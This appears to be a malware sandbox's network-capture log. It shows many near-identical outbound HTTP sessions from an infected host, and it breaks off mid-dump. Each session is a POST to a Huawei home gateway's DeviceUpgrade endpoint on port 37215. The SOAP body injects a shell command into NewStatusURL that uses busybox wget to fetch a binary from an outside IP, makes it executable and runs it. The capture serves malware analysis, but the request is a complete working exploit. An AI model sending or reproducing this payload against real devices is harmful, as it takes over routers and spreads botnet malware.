                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            129192.168.2.1548462197.17.190.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175870895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            130192.168.2.1539214197.185.44.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175909996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            131192.168.2.1539896197.65.240.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175945997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            132192.168.2.1547634197.180.108.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175956964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            133192.168.2.1549092197.39.251.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175977945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            134192.168.2.1560946197.195.21.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175977945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            135192.168.2.1546996197.169.160.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176022053 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            136192.168.2.1548134197.197.252.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176096916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            137192.168.2.1541964197.203.193.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176100016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            138192.168.2.1542166197.249.69.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176112890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 